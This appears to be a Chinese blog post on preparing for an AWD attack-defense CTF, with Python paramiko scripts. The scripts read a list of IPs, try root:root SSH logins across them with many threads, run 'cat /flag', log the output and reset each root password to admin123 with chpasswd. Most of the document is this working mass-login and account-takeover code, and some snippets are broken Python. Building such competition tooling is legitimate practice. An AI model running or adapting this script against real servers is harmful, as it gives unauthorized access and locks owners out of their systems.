前言
最近在紧张备战AWD线下赛,没什么经验,防止有全场密码一样的情况,直接写脚本cat全场flag,然后修改系统密码。
编写记录
paramiko的安装
pip install paramiko
简单的ssh连接例子
import paramiko
import sys
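def SshCon(ip,prot,user,passwd):
    """Open a password SSH session to ``ip``:``prot`` and run ``df`` on it.

    Prints "Success" when the command produces any output. Connection and
    command errors are deliberately swallowed (best-effort probe, as in the
    original example); the client is always closed afterwards, which the
    original omitted.

    Args:
        ip: host to connect to.
        prot: TCP port (parameter name kept for existing callers).
        user: login name.
        passwd: password for ``user``.
    """
    ssh = paramiko.SSHClient()
    # AutoAddPolicy accepts an unknown host key without any verification
    # (it skips the interactive "yes" prompt).
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(ip, prot, user, passwd, timeout=1.5)
        stdin, stdout, stderr = ssh.exec_command('df')
        result = stdout.read()
        if result:
            print("Success")
    except Exception:
        # Best-effort probe: an unreachable host or a refused login is ignored.
        pass
    finally:
        # Release the socket even when connect() failed; close() is safe then.
        ssh.close()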
# Example call: probe the local host on port 22 with the given user/password.
SshCon('127.0.0.1',22,'root','root')
从例子中不难看出,在执行一条 shell 命令后会返回该命令的执行结果,这个结果是字节类型,所以对返回结果进行处理时可以先转换为字符串类型。
修改密码只需执行一条命令
# Sends the new credential to chpasswd over the session opened above; the
# stdout/stderr handles are captured but not read here, so a failure is not surfaced.
stdin, stdout, stderr = ssh.exec_command("echo 'root:admin123'|chpasswd")
多线程对多个IP进行爆破demo
import threading
try:
import queue
except:
from Queue import Queue
class Ssh(threading.Thread):
    """Demo worker thread: pulls one host at a time from the shared queue and calls SshCon on it."""
    def __init__(self,queue):
        threading.Thread.__init__(self)
        self._queue=queue  # shared queue of host strings, filled by main()
    def run(self):
        # Loops until the queue looks empty; get() blocks with no timeout if
        # another worker drains it between empty() and get().
        while not self._queue.empty():
            try:
                iplist=self._queue.get()
                self.SshCon(iplist)
            # The except clause is left out of this demo (the full script below has it),
            # so this snippet is not valid Python as written.
    def SshCon(self,ip):
        '''Omitted in this demo.'''
def main():
    """Load hosts from ssh.txt (one per line) into a queue and run 50 Ssh workers over it."""
    try:
        work = Queue()  # Python 2 name from the `from Queue import Queue` fallback
    except:
        work = queue.Queue()  # Python 3: `Queue` is unbound, the NameError lands here
    with open("ssh.txt") as hosts:
        for host in hosts:
            work.put(host.strip('\n'))
    workers = [Ssh(work) for _ in range(50)]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
完整脚本
#!/usr/bin/env python
#-*-coding:utf-8-*-
import paramiko
import sys
import threading
import os
import time
try:
import queue
except:
from Queue import Queue
class SshSimplepass(threading.Thread):
    """Worker thread: pulls hosts from the shared queue and runs SshCheck on each.

    SshCheck writes to the module-level ``filename`` that is set in the
    ``__main__`` block, so this class only works when the file is run as a script.
    """
    def __init__(self,queue):
        threading.Thread.__init__(self)
        self._queue=queue  # shared queue.Queue of host strings, one per line of ssh.txt
    def run(self):
        # NOTE(review): get() blocks with no timeout; if the queue drains between
        # empty() and get() (possible with several workers) this thread never returns
        # and main()'s join() waits forever.
        while not self._queue.empty():
            try:
                iPlist=self._queue.get()
                self.SshCheck(iPlist)
            except:
                pass  # an error on one host is dropped and the next host is taken
    def SshCheck(self,ip):
        """Try the hard-coded login on ``ip``; on success print and record the host, then run the remaining commands."""
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # accepts unknown host keys without verification (skips the interactive "yes" prompt)
        try:
            ssh.connect(ip, 22, 'root', 'root',timeout=1.5)
            stdin, stdout, stderr = ssh.exec_command('df')
            result=stdout.read()
            # read() returns bytes (possibly empty), never None, so this branch always runs once connect() succeeded
            if not result is None:
                stdin, stdout, stderr = ssh.exec_command('cat /flag')
                result = str(stdout.read(),encoding="utf-8")  # Python 3 form; on Python 2 str() rejects the keyword
                sys.stdout.write('\033[5;32m'+'[+]'+'\t'+ip+'\t'+result+'\n')  # blinking green "[+]" line
                # De-duplicate by re-reading the whole result file on every hit; `filename` is a module global
                with open(filename) as file:
                    if ip not in file.read():
                        f = open(filename,'a+')
                        f.write(ip+'\t'+result)
                        f.close()
                stdin, stdout, stderr = ssh.exec_command("echo 'root:admin123'|chpasswd")
                print(stdout.read())
        except Exception as e:
            # Any failure (unreachable host, refused login, command error) is silently ignored.
            pass
            #sys.stdout.write('\033[31m'+"[NOT]"+'\t'+ip+"\n")
        finally:
            ssh.close()
def main(threadsCounts):
    """Queue every line of ssh.txt and run ``threadsCounts`` SshSimplepass workers over it.

    Args:
        threadsCounts: number of worker threads, as a string or int (converted with int()).
    """
    try:
        work = Queue()  # Python 2 name from the `from Queue import Queue` fallback
    except:
        work = queue.Queue()  # Python 3: `Queue` is unbound, the NameError lands here
    with open("ssh.txt") as hosts:
        for host in hosts:
            work.put(host.strip('\n'))
    workers = [SshSimplepass(work) for _ in range(int(threadsCounts))]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
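if __name__=='__main__':
    # Usage: python <script> <thread count>
    if len(sys.argv) != 2:
        sys.stdout.write("Enter:python %s threads\n" %(sys.argv[0]))
    else:
        path="result/"
        # One result file per day; SshCheck reads `filename` as a module global.
        filename=path+'/'+str(time.strftime("%Y-%m-%d", time.localtime()))+".txt"
        if not os.path.exists(path):
            os.makedirs(path)
        # Create the file up front: workers open it for reading before appending,
        # which would fail on a missing file. `with` replaces the open()/close() pair.
        with open(filename,"a+"):
            pass
        main(sys.argv[1])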